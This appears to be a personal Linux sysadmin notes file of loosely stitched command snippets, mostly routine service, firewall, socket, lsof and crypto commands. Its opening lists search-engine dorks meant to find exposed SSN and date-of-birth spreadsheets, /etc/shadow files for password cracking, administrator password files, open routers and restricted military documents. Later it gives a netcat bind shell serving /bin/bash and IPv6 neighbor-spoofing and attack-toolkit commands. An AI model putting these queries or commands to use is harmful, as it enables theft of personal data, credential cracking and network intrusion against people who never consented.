Xe1phix-Linux-SysAdmin-[Notes]-[.v22.8.58.]-{(01-10-24)}.sh

http://www.searchengineshowdown.com/features/
http://www.netcraft.com/
http://searchdns.netcraft.com/

http://www.stachliu.com/resources/tools/google-hacking-diggity-project/
http://www.stachliu.com/resources/tools/google-hacking-diggity-project/

##   [+]
filetype:xls SSN DOB johnson OR williams OR brown OR davis OR miller
filetype:xls SSN DOB wilson OR moore OR taylor OR anderson OR thomas
filetype:xls SSN DOB jackson OR white OR harris OR martin OR thompson
filetype:xls SSN DOB garcia OR martinez OR robinson OR clark OR
##   [+] Lists of files from the My Documents folder, including Excel spreadsheets:
intitle:"index of" intitle:"My Documents" xls budget
intitle:"index of" intitle:"My Documents" xls business
intitle:"index of" intitle:"My Documents" xls tax
## The same sort of thing, except let's limit our search to the .us top-level domain and look for files
## or folders named "grades" or "attendance" or "behavior" to try to find sensitive information in school records:
intitle:"index of" intitle:"My Documents" site:us grades OR attendance OR behavior
##   [+] School spreadsheets:
intitle:"index of" intitle:"My Documents" site:us xls
## UNIX systems foolishly serving out their /etc directory, some with the file shadow world-
## readable. Pull out the entry for root out of shadow and use Crack to reverse-engineer their
##   [+] administrative password.
intitle:"index of" intitle:etc shadow passwd nsswitch -man5
##   [+] Database administrator's passwords!
intitle:"Index of" administrators.pwd
##   [+] Filemaker Pro database servers that are way too friendly:
"Select a database to view" intitle:"filemaker pro"
##   [+] Sensitive US military and government documents tend to include "DISTRIBUTION
## RESTRICTION: Distribution is authorized to ... only", so let's look for that:
filetype:pdf "DISTRIBUTION RESTRICTION: Distribution is authorized to" site:.mil
filetype:pdf OR filetype:doc OR filetype:ppt OR filetype:xls
"DISTRIBUTION RESTRICTION:" site:.mil -"approved for public release"

##   [+] Find configurations via Google
ext:txf | ext:cfg | ext:bpf netsniff

site:rapid7.com "set TARGET" Sendmail
site:rapid7.com "use auxiliary" MSSQL

inurl:"smb.conf" intext:"workgroup" filetype:conf
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential


site:s3.amazonaws.com filetype:pdf

intitle:"AXIS 240 Camera Server"
intext:"server push" -help


intitle:"netbotz appliance" "OK" -filetype:pdf

intitle:"SpeedStream Router Management Interface"


inurl:"level/15/exec/~/show"                ## Finding  Web  Accessible,  Open  Cisco  Routers


## Exposed Frontpage Credentials
## Using Google to Find Exposed Frontpage Credentials
"# -FrontPage-"filetype:pwd inurl:(service | authors | administrators | users)


related:
inurl:/wp/ site:

filetype:doc inurl:gov intext:"default password"


 * [CIA Vault7 Development Tradecraft DOs and DONTs](https://wikileaks.org/ciav7p1/cms/page_14587109.html)
- [DarkNet Stats](https://dnstats.net/) - Monitors DarkNet Forums & Markets.

- [cuckoo](https://github.com/cuckoosandbox/cuckoo


## ================================================================================== ##
echo "Cloning The Firejail Github Repo..."
## ================================================================================== ##
git clone https://github.com/netblue30/firejail.git
git clone  https://github.com/netblue30/firetools

## ================================================================================== ##
echo "Moving To That Directory..."
## ================================================================================== ##
cd firejail


## ================================================================================== ##
echo "Initiate Firejail Setup Using The Make Compiler..."
## ================================================================================== ##
./configure --enable-apparmor && make && sudo make install-strip


## ================================================================================== ##
echo "Load The Apparmor Kernel Module, Then Compile Into Firejail Source..."
## ================================================================================== ##
./configure --prefix=/usr --enable-apparmor


## ================================================================================== ##
echo "The Apparmor Profile Needs To Be Loaded Into The Kernel..."
## ================================================================================== ##
aa-enforce firejail-default


connecting multiple Firejail
   sandboxes on a virtualized Ethernet network. Applications  include  virtual
   private networks (VPN), overlay networks, peer-to-peer applications.

The tunnel encapsulates Ethernet frames in UDP packets. Each packet is authenticated
independently with BLAKE2 cryptographic hash function (https://blake2.net/).
The keys are derived from a common secret file installed on both client and server.

Compile and install:

git clone https://github.com/netblue30/firetunnel.git
cd firetunnel
./configure && make && sudo make install-strip


firejail --icmptrace

firejail --net.print=
--profile.print=
firejail --protocol=unix,inet
--protocol.print=

firejail --netstats
firejail --nettrace

Monitor  Server  Name  Indication (TLS/SNI)
firejail --snitrace

firejail --trace wget -q www.debian.org
firejail --net=none vlc
--noprinters
--private-cache
--private-tmp

firejail --restrict-namespaces
firejail --restrict-namespaces=user,net
--restrict-namespaces=cgroup,ipc,net,mnt,pid,time,user,uts


firejail --net=eth0 --netlock \
              --private=~/tor-browser_en-US ./start-tor-browser.desktop


firejail --ids-init
firejail --ids-check
/etc/firejail/ids.config


apparmor_parser -r /etc/apparmor.d/firejail-default


cat /etc/xdg/menus/applications.menu


stat --format=%a:%A:%u:%U:%g:%G:%n:%s:%F:%i


There are 14 files in this directory

echo "There are $(ls | wc -w) files in this directory."


##-=================================================================-##
##  [+] Create a directory for the shared or exported filesystem:
##-=================================================================-##

mkdir /var/myshare

##-===============================================================-##
##   [+] Change the permissions to be sure everyone has access:
##-===============================================================-##
chmod -R 777 /var/myshare


##-===================================================-##
##   [+] Enable and start the appropriate services:
##-===================================================-##
rpcbind
nfs-server
nfs-lock
nfs-idmap


apt-cache show bind9 | grep -i status
## Status: install ok installed

systemctl status named | grep -i active
Active: active (running) since Thu 2016–03–17 11:23:48 EDT; 1min
20s ago


##-==============================================-##
##  [+] Use kill to reload configuration files
##-==============================================-##
kill -s SIGHUP $(cat /run/named/named.pid)


ps -ef | grep ^named
ps -ef | grep ^bind
service bind9 status

systemctl enable named
systemctl start named
service bind9 start


named-checkconf /etc/named.conf


service apparmor restart

systemctl enable $Service
systemctl start $Service


##-==============================================-##
##     [+]  List of Active, loaded, and Running Services:
##-==============================================-##
systemctl -a | grep -E '.*\.service.*loaded.*active.*running' | grep -v '@' | awk '{print $1}'


service $Service
service $Service start
service $Service restart
service $Service status
service $Service stop

service  --status-all

service  --status-all | grep -v not running
service  --status-all | grep -v running


service  --status-all


ls /etc/rc.d/rc?.d/$Service
ls /etc/init.d/$Service

chkconfig --level 5 $Service off


chkconfig --level 3 $Service on
chkconfig --level 2345 $Service on          ## make a service persistent on more than one runlevel

chkconfig --list $Service


systemctl disable $Service

systemctl disable cups.service
rm '/etc/systemd/system/printer.target.wants/cups.service'
rm '/etc/systemd/system/sockets.target.wants/cups.socket'
rm '/etc/systemd/system/multi-user.target.wants/cups.path'


systemctl status $Service
systemctl list-units --type=service


service network status
systemctl status networking.service -l
networkctl status

journalctl -u systemd-networkd --no-pager | tail -20


*
service


##-================================================-##
##     [+] NULLify NetworkManager Via Null Symlink:
##-================================================-##
systemctl mask NetworkManager.service
ln -s '/dev/null' '/etc/systemd/system/NetworkManager.service'


systemctl unmask NetworkManager.service


##-=================================================-##
##     [+] Hide nm-applet when NetworkManager is disabled
##-=================================================-##
gsettings set org.gnome.nm-applet show-applet false


##-=======================================================-##
##     [+] Show nm-applet when you want to start NetworkManager:
##-=======================================================-##
gsettings set org.gnome.nm-applet show-applet true


/proc/net/ip_conntrack


determines what column to sort by. Options:
--sort

S Source Port
                   d Destination IP (or Name)
                   D Destination Port
                   p Protocol
                   s State
                   t TTL
                   b Bytes
                   P Packets


--no-dns                    ##  Skip outgoing DNS lookup states


xtables-monitor --trace         ##  obtain monitoring trace events


-j  TRACE                       ##  debug packet traversal to the ruleset


iptables-nft -L

ip6tables-nft -L

arptables-nft -L

ebtables-nft -L

nft list ruleset


iptables-legacy-save > myruleset        # reads from x_tables
iptables-nft-restore myruleset              # writes to nf_tables

iptables-legacy-save | iptables-translate-restore | less


xtables-monitor --event             ##  Watch for updates to the rule set.

xtables-monitor --trace             ##  Watch for trace events generated by packets

xtables-monitor -4              ##  Restrict output to IPv4

xtables-monitor -6              ##  Restrict output to IPv6

iptables -t raw -A PREROUTING -p tcp --dport 80 --syn -m limit --limit 1/s -j TRACE


( $Syntax )& pid=$!; sleep n; kill -9 $pid      ## Run a command and kill it after n seconds


##-===================================================-##
##  [+] Metasploit - gather dns records information
##-===================================================-##
(A, AAAA, CNAME, ZoneTransfer, SRV, TLD, RVL)

msf > use auxiliary/gather/enum_dns


##-===========================================-##
##  [+] Metasploit - Reverse DNS (PTR) Scan
##-===========================================-##

msfconsole
> use auxiliary/gather/dns_reverse_lookup
> set RANGE 192.168.1.0/24
> run


iptables ‐A INPUT ‐p tcp ‐‐dport ident ‐j DROP


network.http.sendRefererHeader to the value 0.
http://moensted.dk/spam/drbcheck.txt
## the best way to determine if a plugin/media type is obeying your proxy settings
## is to use Wireshark to watch network traffic.
## The display filter 'tcp.port== 80 or tcp.port == 443'

http://la-samhna.de/library/rootkits/detect.html


http://brianhill.dyndns.org/site/modules.php?op=modload&name=News&file=article&sid=5&mode=thread&order=0&thold=0
http://packetstorm.security-guide.de/filedesc/wX.tar.html


http://wiki.xensource.com/xenwiki/COWHowTo


--default-new-key-algo


# Encrypt a zipped directory using ssl
tar -zcf - $DIRECTORYIN | openssl aes-256-cbc -salt -out $FILEOUT

# Decrypt a zipped directory using ssl
openssl aes-256-cbc -d -salt -in $FILEIN | tar -xz -f -

# Generate password
gpg --gen-random 2 16 | base64


##-=================================================================-##
##  [+] Quickly Encrypt a file with gnupg and email it with mailx
##-=================================================================-##
cat private-file | gpg2 --encrypt --armor --recipient "Disposable Key" | mailx -s "Email Subject" user@email.com


##-===============================================================-##
##  [+] Send a signed and encrypted email from the command line
##-===============================================================-##
echo "SECRET MESSAGE" | gpg -e --armor -s | sendmail USER@DOMAIN.COM


##-===================================================-##
##  [+] Create passwords and store safely with gpg
##-===================================================-##
tr -dc "a-zA-Z0-9-_\$\?" < /dev/urandom | head -c 10 | gpg -e -r medha@nerdish.de > password.gpg

|gpg -e -r <gpg key id>


##-===================================================-##
##   [+] Generate SHA1 hash for each file in a list
##-===================================================-##
ls $File | xargs openssl sha1


##-===================================================-##
##   [+] Generate SHA1 hash for each file in a list
##-===================================================-##
find . -type f -exec sha1sum {} >> SHA1SUMS \;


##-========================================-##
##   [+] Creating a Certificate Request
##-========================================-##
openssl req -config /etc/mail/certs/mailCA/openssl.cnf -new -nodes -days 1095 -keyout puppy.yourdomaim.com.key.pem -out puppy.yourdomaim.com.csr.pem


##-=============================================-##
##   [+] Generating a 1024 bit RSA private k
##-=============================================-##


##-=========================================-##
##   [+] Signing Your Certificate Request
##-=========================================-##
openssl ca -config /etc/mail/certs/mailCA/openssl.cnf -policy policy_anything -out puppy.yourdomain.com.cert.pem -infiles puppy.yourdomain.com.csr.pem


smtp_tls_cert_file = /path/to/certs/cert.pem
smtp_tls_key_file = /path/to/certs/key.pem
smtp_tls_CAfile = /path/to/certs/CAcert.pem
## You can also add some other options that are useful.
## The first is logging.
## Add the following line to main.cf to enable logging for Postfix as a TSL server:
smtpd_tls_loglevel = 1
## You can also add the following for Postfix TLS client logging:
smtp_tls_loglevel = 1


smtpd_tls_auth_only = yes
Finally, you need to add a line explicitly
##   [+] starting TLS to your main.cf file. For a Postfix
acting as a TLS server, add the following:
smtpd_use_tls = yes
##   [+] For Postfix acting as a TLS client, add the following:
smtp_use_tls = yes


ifconfig -a | grep -E '(^eth|RX.*dropped)'
ethtool -S eth0
ip link show dev eth0

ethtool --show-features eth0
ip address show
ip route show
route −n
ip neigh show

nmcli device status
nmcli dev show


iwconfig eth0 txpower 25
iwlist wlan0 scan
iw dev wlan0 station dump
iwconfig eth0 nwid off
ip link set dev wlan0 address 00:30:65:39:2e:77
ifconfig wlan0 hw ether 00:30:65:39:2e:77


systemctl list-unit-files --type  -services/target


##-============================-##
##   [+] Socket connections
##-============================-##

##-============================-##
##   [+] socket statistics
##-============================-##


##-=============================================-##
##   [+] Show all TCP ports open on a server:
##-=============================================-##
ss -t -a

##-========================================================-##
##   [+] Show established connections with their timers:
##-========================================================-##
ss -t -o


ss -l               ## All open ports
ss -x -a            ## Unix sockets

##-==========================-##
##  [+] Filter by socket:
##-==========================-##
ss -tn sport = :22


Display all established ssh connections.

ss -o state established '( dport = :ssh or sport = :ssh )'


ss --summary            ## Print summary statistics
ss --listening          ## Display only listening sockets
ss --extended           ## Show detailed socket information
ss --processes          ## Show process using socket
ss --info               ## Show internal TCP information
ss --kill               ## Attempts to forcibly close sockets
ss --ipv4
ss --ipv6

ss --tcp
ss --udp


List sockets in all states from all socket tables but TCP.
ss -a -A 'all,!tcp'


##-==================================-##
##   [+] Display HTTP connections:
##-==================================-##
ss -o state established '( dport = :http or sport = :http )'


ss -lup | grep domain


ss -tpan 'sport b::b:2'
ss -tup                                     ## List active connections to/from system

ss -tupl                                    ## List internet services on a system


ss -p | cut -f2 -sd\"                       ## just process names:
ss -p | grep STA                            ## established sockets only

watch ss -tp                                ## Network connections


##-=================================================================-##
##   [+] Lookup autonomous systems of all outgoing http/s traffic
##-=================================================================-##
ss -t -o state established '( dport = :443 || dport = :80 )' | grep -Po '([0-9a-z:.]*)(?=:http[s])' | sort -u|netcat whois.cymru.com 43|grep -v "AS Name"|sort -t'|' -k3


##-================================================================-##
##   [+] Lookup autonomous systems of outgoing TCP https traffic
##-================================================================-##
ss -t -o state established '( dport = :443 || dport = :80 )'|grep tcp|awk '{ print $5 }'|sed s/:http[s]*//g|sort -u|netcat whois.cymru.com 43|grep -v "AS Name"|sort -t'|' -k3


netstat -ant
netstat -tulpn
netstat -na | find /i "Listening"
netstat -na | find /c "ESTABLISHED"
netstat -na | find /c "SYN_RECEIVED"
netstat -na 1 | find ":47145" | find /i "Established"
netstat -nao 1 | find "[DestIPaddr]"


netstat -anp --tcp -4 | grep :22
netstat -nao | find ":[port]"
netstat -nao | find ":[port]" | find "[ClientIPaddr]"
netstat -s | awk '/:/ { p = $1 }; (p ~ /^tcp/) { print }'
netstat -s | awk '/:/ { p = $1 }; (p ~ /^Tcp/) { print }'
netstat -anp --tcp -4 | awk '/:22/ && /LISTEN/ { print $7 }' | cut -f1 -d/
netstat -s | awk '/:/ { p = $1 }; (p ~ /^Tcp/) { print }'


netstat -an --inet | grep LISTEN | grep -v 127.0.0.1


dump just the TCP or just the UDP statistics

netstat -s | awk '/:/ { p = $1 }; (p ~ /^Tcp/) { print }'


pull out just the PID of the master SSH daemon:

netstat -anp --tcp -4 | awk '/:22/ && /LISTEN/ { print $7 }' | cut -f1 -d/


Killing that process just requires appropriate use of backticks:
kill `netstat -anp --tcp -4 | awk '/:22/ && /LISTEN/ { print $7 }' | cut -f1 -d/`


We could also use cut to pull out the second field,
if we wanted to shut down the process using its init script:

/etc/init.d/`netstat -anp --tcp -4 | awk '/:22/ && /LISTEN/ { print $7 }' | cut -f2
-d/` stop
bash: /etc/


netstat -‐antp | grep apache


## ------------------------------------------------------------------------------------------------- ##
    fuser -k /mnt/data          ## Kill any processes accessing the file or mount
## ------------------------------------------------------------------------------------------------- ##

## ------------------------------------------------------------------------------------------------- ##
    kill `lsof -t /home`        ## Kill all processes that have files open under /home.
## ------------------------------------------------------------------------------------------------- ##
    kill %1                     ## kill the previous command that was put In the background
## ------------------------------------------------------------------------------------------------- ##

## ------------------------------------------------------------------------------------------------------------------- ##
    pkill -P 1 sshd     # kills only the master sshd process leaving all of the users on the system still logged in.
## ------------------------------------------------------------------------------------------------------------------- ##


Unix server processes almost always end in "d" (think sshd, httpd, ftpd, and so on)

kill `lsof -t -a -i :22 -c /d$/`


continuous mode:

netstat -nac | grep <Mike's IP addr>

The interval for "-c" is interval

while :; do netstat -na | grep <Mike's IP addr>; sleep 5; done


loop option:
watch -n 1 'netstat -na | grep @IPAddr'


watch -n 1 lsof -nPi @IPAddr


lsof -i @

show you all connections related to the specified IP address
port monitoring examples:

watch -n 1 lsof -nPi :47145


SSH connections:
watch -n 1 lsof -nPi tcp@<ipaddr>:22


SSH connections to all IP addresses:
watch -n 1 lsof -nPi tcp:22


"process whack-a-mole" dead easy:

while :; do kill -9 `lsof -t -i :47145`; done


PIDs of the matching processes
kill those processes

while :; do
    pid=`lsof -ti :47145`
    [[ "X$pid" == "X" || "X$pid" == "X$lastpid" ]] && continue
    lastpid=$pid
    echo -n '*** '
    date
    ps e --cols 1600 -fl -p $pid
    lsof -p $pid
done


alias lsof="lsof -FpcfDi\n" >> "$File"


lsof -i -P -n | grep LISTEN && netstat -tulpn | grep LISTEN

ifconfig -a && ip link show && nmcli device status && route -n


##-================================================================-##
##   [+] List the number and type of active network connections
##-================================================================-##
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c


##-=====================================================-##
##   [+] Monitor open connections for httpd
##   [+] including listen, count and sort it per IP
##-=====================================================-##
watch "netstat -plan|grep :80|awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1"


##-=========================================-##
##   [+] Kill processes of specific user
##-=========================================-##
kill -9 `lsof -t -u $User`


##-=====================================================-##
##   [+] Kill A Pross Running on Port 8080
##-=====================================================-##
lsof -i :8080 | awk '{I=$2} END {print I}' | xargs kill


##-==================================-##
##  [+] Show 10 Largest Open Files
##-==================================-##
lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail


lsof -p $( pgrep sshd )
lsof -p $( pgrep NetworkManager )
lsof -p $( pgrep firefox )
lsof -p $( pgrep lsof -p $( grep sshd ) )


watch -n 1 lsof -nPi :47145
watch -n 1 lsof -nPi tcp:22
watch --color -n 1 lsof -nPi tcp:443
watch --color -n 1 lsof -nPi tcp:80
watch --color -n 1 lsof -i udp:5353 -t
watch --color -n 1 lsof -iTCP -sTCP:LISTEN
watch --color -n 1 lsof -t -c sshd
watch --color -n 1 lsof -i tcp:ssh
watch --color -n 1 lsof -i tcp:22
watch --color -n 1 lsof -u syslog
watch --color -n 1 lsof +d /var/log
watch --color -n 1 lsof -i udp -u root


grep -i segfault /var/log/*                         ##  check for buffer overflows in logs
grep -i auth /var/log/* |grep -i failed             ##  check authentication failed tries


lsof | grep -e "[[:digit:]]\+w"


##-==========================-##
##   [+] List By Protocol:
##-==========================-##
lsof -i TCP
lsof -i UDP
lsof -i TCP:https


##-==========================-##
##   [+] List By Port Num:
##-==========================-##
lsof -i TCP:$Port
lsof -i TCP:$Port-$Port


for pid in $(lsof ‐i ‐t); do
    lsof ‐a ‐p $pid ‐d txt | awk '/txt/ {print $9}' | head ‐1;
done


for pid in $(lsof ‐i ‐t); do
    lsof ‐a ‐p $pid ‐d txt | awk '/txt/ {print $9}' | head ‐1;
done | sort ‐u | xargs ls ‐l


for pid in $(lsof ‐i ‐t); do
    lsof ‐a ‐p $pid ‐d txt | awk '/txt/ {print $9}' | head ‐1;
done | sort ‐u |
while read exe; do
    echo ===========;
    ls ‐l $exe;
    lsof ‐an ‐i ‐c $(basename $exe);
done


lsof ‐i ‐nlP | awk '{print $1, $8, $9}' | sort ‐u


lsof ‐i ‐nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort ‐u


lsof ‐i ‐nlP | tail ‐n +2 | awk '{print $9, $8}' |
sed 's/.*://' | sort ‐u | tr A‐Z a‐z |
while read port proto; do ufw allow $port/$proto; done


##-==============================================================-##
##   [+] Show apps that use internet connection at the moment
##-==============================================================-##
lsof -P -i -n | cut -f 1 -d " "| uniq | tail -n +2


##-=====================================================================-##
##   [+] View network activity of any application or user in realtime
##-=====================================================================-##
lsof -r 2 -p $PID -i -a


##-=====================================================================-##

##-=====================================================================-##
lsof -a -p $PID -d txt | awk '/txt/ {print $9}' | head -1;


##-=============================================-##
##   [+] # Show current listening connections:
##-=============================================-##
lsof -Pni4 | grep LISTEN
lsof -nP -i TCP -s TCP:LISTEN
lsof -nP -i | awk '/LISTEN/ {print $2 " " $7 " " $8}'


##-===========================-##
##   [+] Check Connections
##-===========================-##
lsof -i | awk '{print $8}' | sort | uniq -c | grep 'TCP\|UDP'


##-===========================-##
##   [+] Check Established
##-===========================-##
lsof -i | grep ESTABLISHED
lsof -i -nP | grep ESTABLISHED | awk '{print $1, $9}' | sort -u


##-=======================-##
##   [+] Check Active
##-=======================-##
lsof -nP -iTCP -sTCP:ESTABLISHED | grep HTTPS


##-=======================-##
##   [+] Check LISTEN
##-=======================-##
lsof -i | grep LISTEN


##-======================================-##
##   [+] List all files opened by DHCP
##-======================================-##
lsof -c dhcpd


##-============================================-##
##   [+] List the files any process is using
##-============================================-##
lsof +p xxxx


##-============================================-##
##   [+] List paths that process id has open
##-============================================-##
lsof -p $$


lsof -i


##-========================================-##
##   [+] listening tcp sockets
##-========================================-##
lsof -iTCP -sTCP:LISTEN


lsof -nPi | awk '/LISTEN/'


lsof +M -iTCP:814 -iUDP:811


##-================================================-##
##   [+] use awk to parse the output of:
##       > Process name, PID, and process owner
##-================================================-##
lsof -nPi | awk '/LISTEN/ {print $1, $2, $3, $8, $9}'

lsof -i -nlP | awk '{print $1, $8, $9}' | sort -u
lsof -i -nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort -u


##-====================================================-##
##   [+] list network connections for all processes:
##-====================================================-##
lsof -i[TCP|UDP][@host][:port]


##-====================================================-##
##   [+] list all open files for specific processes:
##-====================================================-##
lsof -p $PID
lsof -c $Command
lsof -c sendmail
lsof -u $Username

lsof +D /var/log/           ## List files in directory
lsof +d $Dir                ## include subdirectories


lsof -i tcp:ssh
lsof -iTCP:ssh
lsof -t -c sshd
lsof -a -i :22 -c /d$/

lsof -i tcp:22
lsof -i | grep openvpn
lsof -Pni | grep
lsof -i TCP:80

lsof -iTCP:ssh
lsof +M -iTCP:814 -iUDP:811
lsof -iTCP:ssh
lsof -a -c myprog -u tony


## Output all processes that are in "LISTEN" mode

lsof -nPi | awk '/LISTEN/'


rpcinfo -p | egrep -w "port|81[14]"
lsof +M -iTCP:814 -iUDP:811
lsof -iTCP:ssh
lsof -a -c myprog -u tony
lsof i TCP i UDP


ps --ppid $$

$(pgrep -P $$)


[ "$(sysctl fs.suid_dumpable)" == "fs.suid_dumpable = 0" ] || state=1
[ "$(grep "fs.suid_dumpable" /etc/sysctl.conf /etc/sysctl.d/*.conf | sed -e 's/^.*://' -e 's/\s//g' | uniq)" == "fs.suid_dumpable=0" ] || state=1

[ "$(sysctl kernel.randomize_va_space)" == "kernel.randomize_va_space = 2" ] || state=1
[ "$(grep "kernel.randomize_va_space" /etc/sysctl.conf /etc/sysctl.d/*.conf | sed -e 's/^.*://' -e 's/\s//g' | uniq)" == "kernel.randomize_va_space=2" ] || state=1

[ $(grep "^\s+linux" /boot/grub2/grub.cfg | egrep 'selinux=0|enforcing=0' | wc -l) -eq 0 ] || state=1


##-=====================================================-##
##  [+] STrace -
##-=====================================================-##
for foo in $(strace -e open lsof -i tcp 2>&1 | grep 'denied'| awk '{print $1}' | cut -d "/" -f3); do echo $foo $(cat /proc/$foo/cmdline)|awk '{if($2) print}'; done


lsof -p NNNN | awk '{print $9}' | grep '.so'

cat /proc/NNNN/maps | awk '{print $6}' | grep '.so' | sort | uniq


strace -e trace=open xtrabackup --prepare --target-dir=2014-11-27_06-06-49
while true; do lsof +D ./2014-11-27_06-06-49 ; sleep 0.1; done


pgrep -u root sshd


tcpkill host ip and port port               ## Block ip:port


tcpkill -i eth0 -9 port $Port

tcpkill -i eth0 -9 host $Host


kill -HUP `lsof -t /usr/sbin/ss`
kill $(lsof -t /home)


lsof -i tcp:ssh
lsof -i tcp:22
lsof -i | grep openvpn
lsof -Pni | grep
lsof -i TCP:80

lsof -iTCP:ssh
lsof +M -iTCP:814 -iUDP:811
lsof -iTCP:ssh
lsof -a -c myprog -u tony


echo "(+)=========================================(+)"
echo "   [+] list all files open on a NFS server     "
echo "(+)======================================= =(+)"
lsof -N


echo "(+)=============================================(+)"
echo "    [+] Listing Files Open by a Specific Login     "
echo "(+)=============================================(+)"
lsof -u $User


Ignoring a Specific Login
=============================

lsof ignore the files open to system processes, owned by the root (UID 0) login


lsof -u ^root
    or
lsof -u ^0


lsof | head -10         ## Provides the top ten files that are open

lsof | wc -l            ## Provides a count of the total number of open files on run

lsof -u root            ## Display open file statistics for that particular user


Listing Files Open to a Specific Process Group

lsof -g $GUID -adcwd                        ## Listing Files Open to a Specific Process Group
                        ## print process group (PGID) IDs.


lsof -iTCP:3000 -sTCP:LISTEN -n -P will yield the offender so this process can be killed.


function killport() {
  lsof -i tcp:$1 | awk '(NR!=1) && ($1!="Google") && ($1!="firefox") {print $2}' | xargs kill
}


for pid in $(lsof -i -t); do
    lsof -a -p $pid -d txt | awk '/txt/ {print $9}' | head -1;
done | sort -u | xargs ls -l


##-========================================-##
##   [+]
##-========================================-##
while :; do kill -9 `lsof -t -i :47145`; done


##-========================================-##
##   [+]
##-========================================-##
ssh-keygen -t rsa -b 4096 -C 'sysadm' -f ~/.ssh/duh


##-========================================-##
##   [+] Create a new host RSA keys
##-========================================-##
##   [?] do not use a pass-phrase -
##   [?] else you wont be able to connect remotely after a reboot):

ssh-keygen -t rsa -b 4096 -f ssh_host_key -C '' -N ''


##-===============================-##
##   [+] Move them into place:
##-===============================-##
mv ssh_host_key{,.pub} /etc/ssh


##-========================================-##
##   [+] Lock down file permissions:
##-========================================-##
chown root:root /etc/ssh/ssh_host_key{,.pub}

curl -o /etc/ssh/sshd_config https://raw.githubusercontent.com/drduh/config/master/sshd_config


Upload the disk image you have saved remotely over SSH to the new Linode. Replace `192.0.2.9` with the Linode's IP address and `/home/archive/linode.img` with the disk images's path.

dd if=~/$File.img | ssh root@192.0.2.9 "dd of=/dev/sda"


autossh -M 0 -f -q -N -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -i "$KEY" -L 3306:127.0.0.1:3306 $REVERSE_TUNNEL $SSH_USERNAME@$SERVERNAME


##-====================================================-##
##   [+]
##-====================================================-##
arp-scan --interface=eth0 192.168.0.0/24


## IP Network scanning


# ARP Scan
arp-scan 192.168.50.8/28 -I eth0


### arping
-----------------------
send ARP request
-i interface -S SIP -s smac -W interval (sec) -c number of probes\
arping -i vlan123 -S 192.168.11.106 -s 54:b2:03:08:4e:d1 192.168.11.1 -W0.09 -c 10

send GARP (unsolicited ARP request)\
arping -U -i [iface] -S 1.2.3.4

bash for loop to iterate through many

for i in $(cat ip_addr.txt); do arping -U -i eth0 -S $1; done


##-========================================-##
##   [+]
##-========================================-##
strace -f -ff -o $File


##-====================================-##
##   [+] trace network system calls:
##-====================================-##
strace -e trace=network,read,write


##-====================================-##
##   [+] trace all Nginx processes
##-====================================-##
strace -e trace=network -p `pidof nginx | sed -e 's/ /,/g'`


##-=======================-##
##  [+] IPv6 Pentesting:
##-=======================-##

MITM-Spoofed-ICMPv6-Neighbor-Advertisement
MITM-Spoofed-ICMPv6-Router-Advertisement
IPv6-Smurf-Attack
IPv6-Smurf-Attack-Details+Duplicate-Address-Detection
IPv6-Duplicate-Address-Detection

##-======================================-##
##  [+] IPv6 Domain Name Servers (DNS):
##-======================================-##
host -t AAAA $Domain
dig -6 AAAA $Domain
dig -x $IPv6IP
nslookup -query=AAAA $Domain


##-=========================-##
##  [+] IPv6 IP Addresses:
##-=========================-##
netstat -A inet6
ifconfig | grep inet6       ## Show IPv6 IP
ip -6 addr                  ## Show IPv6 IP


##-=======================-##
##  [+] IPv6 Traceroute:
##-=======================-##
traceroute6 $Domain
path6 -v -u 72 -d $Domain       ## Traceroute EH-enabled
mtr -6 $Domain
tracepath6 $Domain


##-=================================-##
##  [+] IPv6 Neighbor Networking:
##-=================================-##
ip -6 neigh show            ## Display neighbor cache
ip -6 neigh flush           ## Flush neighbor cache


##-===================-##
##  [+] IPv6 Routes:
##-===================-##
ip -6 route
netstat -rnA inet6
route -A inet6


nmap -6 -sT $DOMAIN                     ## Nmap scan
nmap -6 -sT ::1                         ## localhost

scan6 -v -i eth0 -d $DOMAIN/64          ## Domain scanning
scan6 -v -i eth0 -d $IPv6ADDR/64            ## Address scanning

scan6 -i eth0 -L -e --print-type global ## Discover global & MAC addresses

scan6 -i eth0 --local-scan --rand-src-addr --verbose        ## Link-local & Global addresses :+1:


tcpdump -i eth0 -evv ip6 or proto ipv6

ip6tables -L -v --line-numbers


##-===================-##
##  [+] IPv6 NETCAT:
##-===================-##
nc6 -lp 12345 -v -e "/bin/bash"     ## Listen
nc6 localhost 12345                 ## Connect


ssh -6 $User@$IPv6ADDR%eth0
telnet $IPv6ADDR $PORT


##-================================================-##
##   [+] The Hacker Choices IPv6 Attack Toolkit:
##-================================================-##


##-==========================================-##
##   [+] -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##

##-===========================-##
##   [+] Probing Neighbors
##-===========================-##
netdiscover -i eth0         ## IPv4
ping6 ff02::1%eth0          ## IPv6


##-==========================================-##
##   [+] -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
na6 -i eth0 --accept-target $TargetIP --listen -E $MAC --solicited --override --verbose


##-====================================================-##
##   [+]
##-====================================================-##

ping6 ff02::2%eth0          ## all routers address
ping6 ff02::1%eth0          ## all nodes address

ping6 ff02::1%eth0
ping6 -c 6 ff02::1%eth0
ping6 –c 4 fe80::c418:2ed0:aead:cbce%eth0


##-==========================================-##
##   [+] -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
inverse_lookup6 eth0 $MAC       ## Get IPv6 from a MAC addresses


ICMPv6 Router Discovery

atk6-redir6


##-==========================================-##
##   [+] -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##


##-==========================================-##
##   [+] -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##


##-=============================================================-##
##   [+] dnsdict6 - Enumerate a domain for DNS Record Entries
##-=============================================================-##
## --------------------------------------------------------------------- ##
##   [?] ENUMERATE SRV SERVICE RECORDS
##   [?] ENUMERATE IPV4 IPV6, NAME SERVER, MAIL SERVER WITH OPTIONS
## --------------------------------------------------------------------- ##
atk6-dnsdict6 $Domain
